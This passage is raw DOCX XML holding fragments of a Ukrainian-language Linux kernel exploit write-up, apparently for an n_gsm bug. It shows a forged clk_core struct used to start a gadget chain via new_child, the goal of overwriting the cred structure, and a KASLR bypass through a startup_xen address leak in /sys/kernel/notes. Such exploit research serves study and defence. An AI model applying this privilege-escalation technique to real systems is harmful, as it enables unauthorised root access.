              <w:t xml:space="preserve">(*debug_init)(struct clk_hw *hw, struct dentry *dentry);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">};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2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widowControl w:val="0"/>
        <w:spacing w:line="331.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Визначивши зміщення я вияснив що recalc_rate та set_rate збігаються з членами of_node та orphan структури clk_core.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="331.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Тому в мене вийшов такий мутант.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6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7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19171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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">work_clk_core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uint64_t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data;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">list_head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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">entry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uint64_t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func;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uint64_t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dev;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uint64_t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of_node_recalc_rate;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uint64_t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parent;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uint64_t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parents;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uint8_t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   num_parents;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uint8_t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   new_parent_index;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uint64_t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rate;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uint64_t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recalc_rate;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uint64_t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new_rate;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uint64_t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new_parent;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uint64_t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new_child;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uint64_t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flags;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uint64_t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set_rate;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uint32_t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enable_count;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uint32_t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prepare_count;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uint32_t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protect_count;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uint64_t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min_rate;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uint64_t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max_rate;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uint64_t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accuracy;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int32_t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   phase;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uint64_t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duty;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uint64_t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children;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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hlist_node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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:fill="19171c" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">child_node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uint64_t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   clks;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uint32_t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notifier_count;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">};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8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Але не можна її використати як гаджет для виконання наших функцій. Тому що set_rate перекриває такі члени структури як orphan та rmp_enabled як повинні бути встановлені в нуль для того, щоб виклик clk_change_rate не призвів до падіння системи. Але можна призначити адресу наступного гаджета в члені new_child який служить аргументом для рекурсивного виклику. Тому ця структура служить як start для ланцюга гаджетів. Далі очікуємо якийсь час (3 секунди) щоб точно можна було зрозуміти що фейковий work_struct виконався і отримати бажаний результат як перезапис структури cred.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB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2"/>
        <w:widowControl w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gu95t2pormln" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Обхід KASLR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr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отримання інформації розташування ядра було використано вразливість витоку адреси startup_xen в /sys/kernel/notes.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JetBrains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JetBrains Mono" w:cs="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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</w:pPr>
    <w:rPr/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hyperlink" Target="https://elixir.bootlin.com/linux/v6.5.13/C/ident/gsm_dlci_begin_open" TargetMode="Externa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t.me/YuriiCrimson" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://t.me/itcrowdua" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/YuriiCrimson/ExploitGS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JetBrainsMono-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMono-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMono-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrains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